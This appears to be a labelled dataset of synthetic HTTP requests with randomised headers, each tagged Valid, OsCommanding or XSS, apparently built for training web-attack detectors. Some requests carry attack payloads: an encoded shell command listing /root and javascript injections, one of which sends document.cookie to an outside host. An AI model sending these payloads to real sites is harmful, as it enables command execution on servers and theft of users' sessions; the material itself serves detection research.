gIqz=uwttRsduye&or8J-=46139&tJsawyththrs=14023927&ux=3iEKhr8Sinhap&arbatrt=HtbvtXote&I0heetkydt0o=viN&h7ieCouihjttin=atdUmqUNF&xtddEeohe5=rQ0_&t2te0c=786320&oytrlttohg=2&2XOApp5=ixWV78OxtCa&Fhssts9efsnsa=07&onpoaodadtRltF=hehuoscydcu

End - Id: 33416
Start - Id: 6000
class: Valid
POST /sb0IfCI6oVLn/rwicsma5o9r5nuds/awe4ejrhiJhmfy/te8Gasstof5xtj.gif? HTTP/1.1
Content-Length: 107
Content-Language: y,o9jtmmm
Content-Encoding: gzip
Content-Location: /oryl/tocn2Muk/tnearf/wdke.wmn
Content-MD5: dHE1ZXR0eGVuZWVvbzJFMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Aug 06 07:23:52 CET
Last-Modified: Tue, 15 Jan 08 21:12:38 GMT
Host: 35.224.82.132
Connection: close
Accept: audio/basic;q=0.9
Accept-Charset: windows-874;q=0.7
Accept-Encoding: deflate, gzip;q=0.2, deflate;q=0.6
Accept-Language: tiap4-peenbh;q=0.6, iniwp-E;q=0.3, s-61;q=0.0
Cache-Control: max-stale=0400
Client-ip: 67.163.105.95
Cookie: 26fl=96079;aqutzsohcve=gssm>mhljc
Cookie2: $Version="7"
Date: Sat, 25 Sep 04 09:17:02 UTC
ETag: W/".CX1myNpTOWnQmhPJl"
Expect: 100-continue
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Sun, 28 Feb 10 16:36:26 GMT
If-Unmodified-Since: Mon, 30 May 05 16:09:07 GMT
If-Match: "5dKDUWmfjbQqAts5v"
If-None-Match: "HvW.I.FMM6vif35CiW"
If-Range: Tue, 26 Feb 08 16:56:08 GMT
Max-Forwards: 8
MIME-Version: 4.3
Pragma: L=oana
Proxy-Authorization: ueyia tnem=hshmu4l
Authorization: idemhd 4h5L=ivnekuhb
Range: 49-556,54707-
Referer: /6rre1oo.zip
TE: trailers,trailers,deflate
Trailer: Warning
User-Agent: Mozilla/5.8 (compatible; licsasuar; Unix; lxall; 6Ezhhitt)
UA-CPU: PowerPC
UA-Disp: 0303,1172,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3062x279
Via: 3.9 26.75.225.245, 3.2 www.tnwx.gif, HTTP/8.6 www.ily8nilz.shtml
Transfer-Encoding: identity
Upgrade: sSsh0/2.9, sad61a/4.3, eEno/3.4, 1jEe/1.8, Sde/6.5
Warning: 330 www.Oteemon.tiff:442 "eenlria" 
X-Forwarded-For: 26.237.65.198
X-Serial-Number: 381725681
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe=erfnme|a&oycauabnpo0atR=t3processing-instructionnon&ustnsJwlyer=iNy8Zr1&coxiietf=585915&aGm72L-aq=)h

End - Id: 6000
Start - Id: 36791
class: OsCommanding
GET /a7XP/scehamhesomsaFooolnn/Lfnffdeiemloylzi7y.css?cneacsfnGe=%5Cnls+++++%2Froot%2F&E7mesehuI=2517905066&0rcpzsKvarqW=v9qrArhueiisyE64w0&40Wg9H.HDyBt=g%3FCimgi&es=4 HTTP/1.1
Host: www.CsWn.de
Connection: Hcoha
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 184.247.184.110
Cookie: te= 1]tnmgu;neswb=snz;tv7cnspoer4tubn=8925053952
Cookie2: $Version="1"
Date: Sun, 04 Jun 06 02:19:09 GMT
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: 100-continue
From: hlu5mLe@yeep.ch
If-Modified-Since: Mon, 18 Dec 06 09:16:56 CET
If-Unmodified-Since: Sat, 15 Dec 07 23:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: "4k3HD7n.qUbdpFqx-f"
Max-Forwards: 774
MIME-Version: 1.1
Pragma: reuo5gst='pl'
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: Digest realm
Range: 907-5,-807
Referer: /Hssd.pdf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.2 (X11; U; SunOS sun4u 2.1; ts-ae; rv:4.8.0) Gecko/47939806
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: gacaa; 0cem2J=oant2IE
Upgrade: wfs/7.4
Warning: 133 www.UaEc.shtml:24599 "tmgftooT" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36791
Start - Id: 11847
class: Valid
GET /oIHKyW8.Klm-C9C/ohelirlenniemz/tnahmheeei9elvaacryn/miwnngladwheKbsn.tiff? HTTP/1.0
Host: 251.66.132.126
Connection: close
Accept: image/*;q=0.0
Accept-Charset: isiri-3342;q=0.9, windows-1251;q=0.4, euc-tw;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-age=23
Client-ip: 18.97.57.49
Cookie: mh=+Et>u1=|;o:nph-/;nEYIT-7=2364835;13YHoUT=atucr;ns=asipmztg;lrvuuaKe=y6as5fo7formcnatdur+sbexec;ftiE=~0mocha0r
Cookie2: $Version="31"
Date: Fri, 16 Jul 04 08:47:12 CET
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: 100-continue
From: tettqfmr@aac7ikiH.biz
If-Modified-Since: Fri, 07 Jul 06 19:14:35 GMT
If-Unmodified-Since: Sun, 10 Apr 05 17:04:31 GMT
If-Match: "g-GIX1Nj04..h.GFN0Ax"
If-None-Match: *
If-Range: "JAl2h8dgjsFhhZeKR54s"
Max-Forwards: 9
MIME-Version: 2.2
Pragma: cirmmt7=es
Proxy-Authorization: Digest uri=/sde0s9/ohlmju.mpeg
Authorization: Basic ZXU2bmdyQTA6emxpM2ZTbWU=
Range: 58-5013
Referer: /oiba/80oiS/oDalmcka/piw5ee.cfm
TE: trailers
Trailer: Date
User-Agent: hseatoe (dfV-tmwJ; yhrTI-AC; l1HCC.birF; arfH26)
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8781x277
Via: 3.0 210.145.181.112, dhMjn/9.4 www.xiansd.gif
Transfer-Encoding: identity
Upgrade: qeona/2.2, e3aae/0.6
Warning: 315 www.oatloe.css "eSpaaytaurstt" "Thu, 12 Mar 09 20:27:38 UTC"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 3151909596780283547
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11847
Start - Id: 22311
class: Valid
GET /hplNwS.PXVKNEfNOL.n6/dtu/RjySmochaTNmail@idC/s4QLkfPkFIl0ba3zrKNh/cShyGNK/r8LKZwVG7Ko.png? HTTP/1.1
Host: www.5tnmahiA.biz:46840
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: u-l4reesjd, 2gtl-mrSou;q=0.3, ndaos-lftHt
Cache-Control: no-transform
Client-ip: 77.119.118.42
Cookie: QzreYhsaZ=100388;ee9Tpme6Ee1s=0&S;iCaiwHttl=l@Btmv4jN6;Et10Aaoels=10WlxyOD1d;npenAetlnonnHan=cMLXIhlaYw
Cookie2: $Version="57"
Date: Thu, 14 Jul 05 20:55:39 UTC
ETag: "Q6r-.ZHASE_U9EZ2b"
Expect: 100-continue
From: auRypu@Ia7irt.fr
If-Modified-Since: Mon, 31 Mar 08 12:33:55 UTC
If-Unmodified-Since: Tue, 29 Sep 09 23:38:16 CET
If-Match: "1TySx0BfA0iqQuVpJi9"
If-None-Match: "fxF3o-gYwoeumSauP3"
If-Range: Wed, 28 Apr 04 15:28:47 GMT
Max-Forwards: 163
MIME-Version: 7.8
Pragma: teecn='Ail'
Proxy-Authorization: NTLM Z3A1dE8wdEh0YW9mb2RhZWE0czdlczZjODMyQ290cnRtYTF0NHc=
Authorization: Digest username="imsra9"
Range: 394544-569495,98730-
Referer: http://www.ek4ltre.org/tgCse.doc
TE: chunked;q=0.0,gzip
Trailer: Trailer
User-Agent: Mozilla/6.5 (compatible; Konqueror/0.5; Linux i386; 4l7uge8o)
UA-CPU: Sparc
UA-Disp: 730,116,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6713x3375
Via: 7.5 www.faorntit.js, 7.9 153.76.135.117, 0.6 www.ercxt.html
Transfer-Encoding: identity
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 770 75.153.53.86 "w8itmUrzdkl" "Thu, 24 Aug 06 03:48:31 GMT"
X-Forwarded-For: 148.120.96.11
X-Serial-Number: 8809830
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22311
Start - Id: 30973
class: Valid
GET /owneeA/eo/8shde1rlRt8q6pehoue/eLplM0r./x4qH.t/ro.dll?-a5S=documenta39we1%3B%5B&ydaMoM6=gdr&Meeg=ojn5sp1nwf&mmaajP=f%27s%3Cmal+aaiqe&gxis=epboot.ini&deee7morwenAr=+e-+thttpsrscriptdaodt&lott4ogzHe=r8aDntm&xhiEOnetcatIS=rfir&dyTeet0ayp1rii=tedaoaechotu&a4UR3=9&Po=tE&rbm=passthruh%7Ea+sar%5Bset+tnc&nnH=6708383292&3brinteOs=16872009&eyNgrcrobhiia=a99f0dcZ HTTP/1.1
Host: www.q7oe.cz
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-stale=601
Client-ip: 247.73.147.159
Cookie: sstkatossu3o2N=h7N.Bgj
Cookie2: $Version="339"
Date: Tue, 14 Dec 04 24:14:09 GMT
ETag: W/"REI7ojq-I7rW108"
Expect: 100-continue
From: grsl@tetg8e3sNy.uk
If-Modified-Since: Tue, 22 Sep 09 17:11:24 CET
If-Unmodified-Since: Tue, 04 May 04 12:47:00 CET
If-Match: "wdHe3UMnh7mOoSZ"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: sa9qtC oa7o=iisi1be
Authorization: Basic MGRuc1VpOTp0cGM1bmFp
Range: -998
Referer: http://iroTmnyl.cz/fnh3nYn/npeoot8/zeo6h/qHblar.jsp
TE: trailers,gzip,trailers
Trailer: Via
User-Agent: Mozilla/6.3 (compatible; MSIE 0.3; Win 9x; Kitwa; hysA; 5hitr)
UA-CPU: PowerPC
UA-Disp: 6522,303,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 349x4408
Via: uys/3.0 www.ymh7.js, 2.8 28.236.90.11, 5.1 165.245.97.151:20959
Transfer-Encoding: deflate
Upgrade: ehia/0.0, eN7b/7.6
Warning: 455 www.uhaotir.htm:513 "Nuftr" "Sun, 14 Sep 08 14:47:19 GMT"
X-Forwarded-For: 228.18.153.246
X-Serial-Number: 65625
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30973
Start - Id: 16268
class: Valid
GET /tJlxz5Ez4b-.php3?lX@53e_n=rFOtT&korotpaqsgx8sth=clszh&1ipuaesebtabna=nAtae2&nAniofsAe=54&cn=sunoEtsan-n%299gls HTTP/1.0
Host: www.wwtoU.ch
Connection: close
Accept: video/*
Accept-Charset: x-mac-chinesetrad, euc-cn;q=0.8, iso-8859-8-i
Accept-Encoding: gzip;q=0.0, compress
Accept-Language: is-9d, Uciarue-jhb;q=0.2
Cache-Control: no-store
Client-ip: 226.116.113.191
Cookie: 6IOOqgroup byQ=47413604;sepeis5hcensne=210509790;niewncsehcnp=eeIj;Ee9bwinntWV=025808
Cookie2: $Version="95"
Date: Wed, 27 Jun 07 03:43:48 UTC
ETag: "CXANZw0Rk-KOgM1Jc6X."
Expect: 100-continue
From: 5oSecmlh@N6omaecn.biz
If-Modified-Since: Wed, 13 Feb 08 10:15:12 CET
If-Unmodified-Since: Wed, 28 Jun 06 21:23:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2601
MIME-Version: 2.6
Pragma: hrsaha='rL'
Proxy-Authorization: NTLM aWd1b01jaGlyYmdsb3JTdDJudEVraTJscm1uRGVvdW9tcnQ=
Authorization: Basic TnJocmlzcTpuZG1j
Range: 767-,-23616
Referer: /cn6drM/wuae.png
TE: gzip;q=0.3
Trailer: Max-Forwards
User-Agent: Mozilla/1.1 (compatible; 0eebuhaa; WinNT; eteoemz47t)
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2602x876
Via: HTTP/5.7 236.152.8.205, HTTP/1.1 143.66.188.211, FTP/9.4 www.nnuoU.tiff
Transfer-Encoding: compress
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 166 74.19.225.172 "Aeihd" "Thu, 05 Feb 09 21:40:35 CET"
X-Forwarded-For: 182.148.242.42
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16268
Start - Id: 46960
class: XSS
PUT /a9mpa9ths2/4aWnedeV@e8L2Myo_-/di84gkwryrmddtupeesk/n7re3Kv/elVchdpST_i16P/sM/fb7ehsogasZwoc5Oong/deiahh25oiosoefetsba/o0h.html? HTTP/1.1
Content-Length: 109
Content-Language: a,wftcmlNr,qll9noao
Content-Encoding: identity
Content-Location: http://CpfEj.net/h7qul/eiAbeia.exe
Content-MD5: eHJldGFoaGFyYWVhM3VpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Mon, 30 Nov 09 19:27:56 CET
Host: 122.69.123.61:80
Connection: eeC3ce1n
Accept: image/*, text/xml;q=0.6
Accept-Charset: hz-gb-2312;q=0.3
Accept-Encoding: 
Accept-Language: A9anbceg-ravtf;q=0.1
Cache-Control: max-stale
Client-ip: 248.152.241.195
Cookie: 4ze=1;tnt2a=include=e;shfEde=t@GR;CMXx=2kbaegesi;haeLkncdo9=e1givdAa.3u
Cookie2: $Version="609"
Date: Sat, 06 Jan 07 17:40:24 CET
ETag: "NViduy7oqvlSc-i"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Tue, 19 Jan 10 19:55:27 UTC
If-Unmodified-Since: Sat, 12 Jan 08 03:46:11 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 1
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest nc=ff89aaf3
Authorization: Basic ZWx2eWdOOmloYzRv
Range: 7-,-974,384-64
Referer: /tvqr.wmn
TE: trailers
User-Agent: slont/7.8.4.6.1
UA-CPU: 68000
UA-Disp: 698,9133,32
UA-OS: FreeBSD
UA-Color: color16
Via: 8.2 www.RUnn8ob.html, 6.4 65.123.252.221
Transfer-Encoding: gzip
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tseuielk0hEIh=<img     src =   "    javascript:  [alert  ('he');]"  >&Eh=9tsdxcthig

End - Id: 46960
Start - Id: 22064
class: Valid
GET /vof@biH2.zaz/vmmO/NMfEoSW5.php4?hdn=dwH%40H&hkwh0Och=Mstgeish8e70er&2l=27&5fjfwz2Tto9=varta&0suvsttu=er52ihciy%5Dlt&ytTS@=p4GnpdIQehlL&srnrsdsxtisdei8=setss&aem=%2Bc9sdeleteiCt%5Bn&lhrrnMtnT=034&tmp32XAc9T=2963930&hdgohoeyt=724191 HTTP/1.1
Host: 168.50.106.150:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.8, compress;q=0.3, compress, deflate;q=0.9, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 62.126.220.31
Cookie: saNawighrsa=520;aschcnSilsroonl=9118939069;3GadmingWB=6;unBtYt=n-gPFpNvc
Cookie2: $Version="0"
Date: Tue, 13 Dec 05 16:55:16 UTC
ETag: W/"kPLtVKQiUiN1u_DtD8s"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 21 Apr 08 10:11:26 GMT
If-Unmodified-Since: Tue, 07 Jul 09 24:41:23 CET
If-Match: "cNLLVmUJbiu9CTD80S"
If-None-Match: *
If-Range: Sat, 16 Jul 05 15:53:30 GMT
Max-Forwards: 375
MIME-Version: 0.3
Pragma: 1ht='cgepieno'
Proxy-Authorization: bVsst cmoe=heeoree0
Authorization: Basic d29JNjpyMDgz
Range: -774
Referer: http://www.ehhqed.cz/oRbCr/a2EXHree/s8som/IhRtd.sh
TE: gzip;q=0.1
Trailer: TE
User-Agent: lhPH.Sh http://www.qRarho.be
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: 3.9 15.205.109.189:5, nsarch/8.3 111.89.171.112
Transfer-Encoding: Aneow; rtr0Atr=1repeaus
Upgrade: ewHj/5.7
Warning: 377 253.201.21.135 "5jiuaat" "Mon, 24 Dec 07 17:02:15 GMT"
X-Forwarded-For: 30.171.197.154
X-Serial-Number: 10148622161169
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22064
Start - Id: 7035
class: Valid
PUT /5srbn1mWjSIl6eM/pjeNa9ip.png? HTTP/1.0
Content-Length: 30
Content-Language: eunwzult,c
Content-Encoding: compress
Content-Location: /ahts/oaroa/rwadwl/ostWsea8.exe
Content-MD5: bGVhd2dlYUN1Tmd6ejhzbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Mar 05 22:35:42 UTC
Last-Modified: Sat, 29 Nov 08 12:40:45 UTC
Host: www.ualtydhi.it:80
Connection: heaLe5L8
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ib-4hfcs;q=0.9, Dtdiyse-lobw
Cache-Control: no-transform
Client-ip: 87.182.10.196
Cookie: tIi=11062527;trtlrmirrpp=nljq5LZ;a2BbjHyp=41417216;9m6MY=cpLc;xsiptqlvNkA=e3
Cookie2: $Version="2"
Date: Tue, 30 Dec 08 12:35:08 UTC
ETag: "5mD4pIqzxc3lOyc"
Expect: 100-continue
From: eln6b@9n59dT0o3.fr
If-Modified-Since: Mon, 03 Oct 05 12:34:24 GMT
If-Unmodified-Since: Thu, 15 Jul 04 12:44:28 GMT
If-Match: "95pCybfAFnMF56IsFBx"
If-None-Match: *
If-Range: Wed, 17 Jan 07 05:53:38 CET
Max-Forwards: 150
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: cls18 ensvsjo=ofs8etd
Authorization: Basic dHRuYm46YUxlTmNz
Range: -251792
Referer: http://www.NaRernjT.ch/ortiddb/mtee5h/gnofpd/otdbvbni.tar.gz
TE: deflate
Trailer: Accept-Charset
User-Agent: rLTv27CdIG http://www.Eeacuad.net
UA-CPU: x86
UA-Disp: 1173,628,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8498x1908
Via: 3.9 www.raugr.png, FTP/0.2 226.122.10.93, 3.8 164.8.123.137
Transfer-Encoding: deflate
Upgrade: nepoz/8.4, wie/3.9, lnenne/2.6
Warning: 036 www.itrr13.png "nibefaudetRu5ldaaj" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: ----------------
~~~~~: ~~~~~~~~~~

mohseiqo9gmr=nf> hf8saeb>5

End - Id: 7035
Start - Id: 21785
class: Valid
GET /ereeropsenAeeotmho/im/Pyie8bnoridniGi3bsNf/aGXCnUeZyNYVPIq0t/oKorcvu8/ejWWr67iz_L0NsNbLT/opz2.mdb?Se4=%7E%2F HTTP/1.1
Host: www.tcknA1n.uk
Connection: close
Accept: image/*, text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.6
Accept-Language: a0eUa-renasex, 3yh3ne-dia, nTeglr-eno;q=0.2, rqo-cir;q=0.6, oeutRl-tLz;q=0.9
Cache-Control: ifr8rht=3j3hsa
Client-ip: 160.47.185.36
Cookie: phpR1IzJ9node7hmE=a<rn;bbjeayEtl4fha=b tE?3atelnet817tao-admin~
Cookie2: $Version="697"
Date: Thu, 19 Feb 04 10:23:29 UTC
ETag: W/"YTr.oIfZeZW-Y1a9FtK"
Expect: namlElv=leiohmpn;th1aIoRt=aiAtat
From: se39c@pn1i.cz
If-Modified-Since: Tue, 18 May 04 24:16:53 CET
If-Unmodified-Since: Mon, 06 Apr 09 16:59:44 CET
If-Match: "he2HUqqjYXEr@jNp.F"
If-None-Match: "o9gXzkYLyGTZARs"
If-Range: Sat, 11 Jul 09 14:13:48 CET
Max-Forwards: 695
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: fnbd xgbn=ialtgsd
Range: 8682-
Referer: /feppae.php3
TE: deflate;q=0.9
Trailer: Cache-Control
User-Agent: rhde7ulOn5 (stF0roKA)
UA-CPU: Sparc
UA-Disp: 8956,517,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9055x3634
Via: fzg9ed/5.8 206.180.77.74, 4.7 www.afsc3.html, 5.9 www.h3rb.gif:3918
Transfer-Encoding: gzip
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 112 www.tu1sEln.png "osnbT8nl" 
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 2336379725238
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21785
Start - Id: 33336
class: Valid
PUT /oJ-7lBajHlYbJgW5Xrb/ite1dnbe5eveEhs6e/i0vFtSdi3ZO./tVzT.css? HTTP/1.1
Content-Length: 222
Content-Language: bN
Content-Encoding: gzip
Content-Location: /eaos/mhswt/peg0bht.mp3
Content-MD5: cnRobDZvN29laGl6c2hpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Aug 06 08:42:56 UTC
Last-Modified: Tue, 31 Jul 07 09:14:44 CET
Host: 1.187.187.195
Connection: leoea
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.5, gzip;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 219.255.155.213
Cookie: r5gLtu=yheogUui;eu5e5vsceTab3a=i4u;oTbioaf=7e;iCfz=puneg;migqlh=6
Cookie2: $Version="5"
Date: Mon, 12 Dec 05 24:50:35 CET
ETag: "6FRjqz0On_Co9UWTL8E"
Expect: 100-continue
From: gn93As@dhNYgeNDu.be
If-Modified-Since: Thu, 12 Nov 09 14:26:08 GMT
If-Unmodified-Since: Thu, 13 Nov 08 05:02:45 UTC
If-Match: *
If-None-Match: *
If-Range: "A3Iq.YRavxCJZIMAw"
Max-Forwards: 0084
MIME-Version: 8.6
Pragma: yntve='lr7eat'
Proxy-Authorization: t8enr uqsT=osmiN
Authorization: Digest nc=EFE98F4C
Range: 02-,-079218,7-
Referer: http://loni.cz/hrya/a7nwTn/ttScHv/4aide/w0uA.rar
TE: gzip,chunked,chunked
Trailer: User-Agent
User-Agent: wjxeqI7 http://www.ornloIi.com
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 2Pd/5.1 www.a32erlo.jpg
Transfer-Encoding: deflate
Upgrade: 6stde/0.3, ewtMfk/8.5, rt9eT5/1.5, nSTo/9.3
Warning: 231 205.9.41.94:7104 "5bslathe9ce" "Sat, 19 May 07 07:06:34 CET"
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 507745328384064
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hbzhrvTtdo1a=t'aeotmcr99t smzss&ntsO7bTs4e5=nE-IwXoHi&SKfr@=isHcv&div4_X=0&r24eo54vnon=lekgamdo&eIhei2aisaAb=hioteebIs19&n5uraq=knshttps&Ll95WexecaiX19=g te&YhzS=techoi|wnoio&yiltm5P04eidnio=1&RAt8=retps&eE=documento0m

End - Id: 33336
Start - Id: 46596
class: XSS
GET /rdB.jpg?vtt=464072&emb=318769&RlnodeAtS=31989&itgu=%5Bmo%40pi&i2t=hy6c&uhyn=%3A%40hr&vteoqtHoh8aO9th=303&wm@formj_include=sg_.UIQU5XS&baaoAe6c1nt4db=332810&leies1rnkcr=29&ZkfKzU=435960&4mn9ndTdBhe9=Cb&aahewaesksmu=o%28tCjmfeqO%25uixiaay HTTP/1.1
Host: 37.182.105.58:80
Connection: Ase8Ity1
Accept: application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.3, compress, identity, compress;q=0.8
Accept-Language: <xml    src   ="     javascript:   [document.location.replace ('http://www.etenns.com/cgi-bin/ereril.cgi'+document.cookie);]    "  >
Cache-Control: only-if-cached
Client-ip: 83.13.216.219
Cookie: Aa0hr= t2;gCfromG=so2n6plesth;td=evz;loc4bmndivce=gilhhuKtpann7otsft;hru2paSdnhrnleu=hto7IsfO9Iy
Cookie2: $Version="450"
Date: Mon, 27 Jul 09 17:24:46 GMT
ETag: W/"8Su7pNQCkfhfoAvcE"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Thu, 16 Aug 07 03:23:39 GMT
If-Unmodified-Since: Tue, 03 Nov 09 20:23:31 CET
If-Match: "c4qO6kQE52ErXuKX"
If-None-Match: *
If-Range: Fri, 06 May 05 03:43:51 CET
Max-Forwards: 2
MIME-Version: 1.9
Pragma: ica=oeicS4
Proxy-Authorization: Basic b3BvdTlsOm50Y28=
Authorization: dieu tqdai4e=aRe2moj
Range: -2,441595-
Referer: http://nAm55as.net/rohdtlTh/seruFe/pVEio.cfm
TE: chunked;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 5.3; al-ml; rv:5.8.0) Gecko/03766367
UA-CPU: Sparc
UA-Disp: 1938,517,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: deflate
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 146.70.16.14
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46596
Start - Id: 10783
class: Valid
GET /tUTALKPhlPB9xku/ecuynloba/e4u@zEhXyW3H/oK7R2ncBx/Rkrul9rat4lxomn.swf? HTTP/1.0
Host: www.rRuo.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1253;q=0.1, iso-2022-jp;q=0.8, x-mac-chinesetrad
Accept-Encoding: deflate, compress, compress, compress;q=0.3, deflate;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 225.40.27.221
Cookie: re5a67D=50975;halhnriiw=2628812;rdphbdVDaSinl=oKafI
Cookie2: $Version="49"
Date: Mon, 12 Nov 07 19:48:25 CET
ETag: "7omz5rszUD.wbKskcl6d"
Expect: 100-continue
From: Ionmrq@m5vte.org
If-Modified-Since: Tue, 01 Aug 06 17:26:44 UTC
If-Unmodified-Since: Tue, 24 Aug 04 19:59:20 CET
If-Match: "LpQ2gxx4wCO795Xl"
If-None-Match: "5n38zsqLHs-enQmT"
If-Range: Tue, 14 Oct 08 13:13:28 CET
Max-Forwards: 97
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic ZG5lMWU6c2VlcGNvbGM=
Authorization: o2mpes nwdh2=tf2soptq
Range: 9796-,-734449,-593032
Referer: /ivsSrwa/ty0i/adeth.msf
TE: trailers,trailers
Trailer: Host
User-Agent: etem5r4eAcojeoxy
UA-CPU: StrongARM
UA-Disp: 4468,6865,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5959x647
Via: 4.4 www.rqmyts.html
Transfer-Encoding: identity
Upgrade: tup/2.0, iesn/6.5
Warning: 338 www.myshle.html "dsnoeliE" "Sat, 04 Jun 05 21:44:38 CET"
X-Forwarded-For: 64.18.140.176
X-Serial-Number: 0778249732666
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10783
Start - Id: 19792
class: Valid
GET /imxVW6K0ZbNGkBcjj3Bs/iXKP@_OTCKcVoHh@b/_gOQI/GV/iZCNvDrpJr_/nmehniociom/gM2tx.UN5BUK8ZU/a@wy8g8spl.CggJ50/g_Y6Qe7uTzA.html?16aEteStreh=xysbdm&replacew32tcinsert=%7Emrfo26Me0ae&jgiadas2=e9gh&cU5oE=hnetcatctihue%3Feidelete%27aaccess_logg&arAioedatsce=tlatd&aeEr=6nnulln%3F HTTP/1.1
Host: 236.253.81.127
Connection: fmRd
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dio-p3h;q=0.8, ifsi-stC;q=0.4, 8tly-rjTiht;q=0.4, eens1E-0Fr
Cache-Control: min-fresh=3
Client-ip: 4.120.1.21
